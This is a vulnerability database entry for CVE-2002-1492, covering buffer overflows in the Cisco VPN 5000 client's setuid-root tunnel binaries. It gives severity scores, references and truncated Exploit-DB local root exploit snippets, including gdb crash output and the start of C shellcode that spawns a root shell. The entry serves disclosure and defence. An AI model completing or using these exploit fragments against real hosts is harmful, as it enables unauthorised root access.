CVE-2002-1492
Published 2003-04-02
Priority P427 | high | 7.2 (CVSS 2.0)
AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.72% (74.6th percentile)
Buffer overflows in the Cisco VPN 5000 Client before 5.2.7 for Linux, and VPN 5000 Client before 5.2.8 for Solaris, allow local users to gain root privileges via (1) close_tunnel and (2) open_tunnel.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | vpn_5000_client | — | — |
| cisco | vpn_5000_client | — | — |
No detection rules found.
Exploit-DB
Cisco VPN 5000 Client - Buffer Overrun (1)
exploitdb·2002-09-18
---
// source: https://www.securityfocus.com/bid/5734/info
Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.
/*
* [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
* (C) BrainStorm - 2002
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb) i r
* eax 0xffffffff -1
* ecx 0x0 0
* edx 0x0 0
* ebx 0x4015c154 1075167572
* esp 0xbfffdb70 0xbfffdb70
* ebp 0x41414141 0x41414141
* esi 0x400168e4 1073834212
* edi 0xbfffdb
Exploit-DB
Cisco VPN 5000 Client - Buffer Overrun (2)
exploitdb·2002-09-18
---
// source: https://www.securityfocus.com/bid/5734/info
/*
* Cisco VPN 5000 Linux client version 5.1.5 local root exploit
*
* By zillion[at]safemode.org 09/2002
*
* Greets to the 0dd people ;p
*
*/
#include
#include
#include
#define BUFFER_SIZE 2504
#define NOP 0x90
#define RET 0xbffff0e0
char shellcode[]=
/* setresuid(0,0,0) && execve("/bin/sh",["/bin/sh"],0); */
"\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\
No writeups or analysis indexed.
References
http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtml
http://www.iss.net/security_center/static/10131.php
http://www.securityfocus.com/bid/5734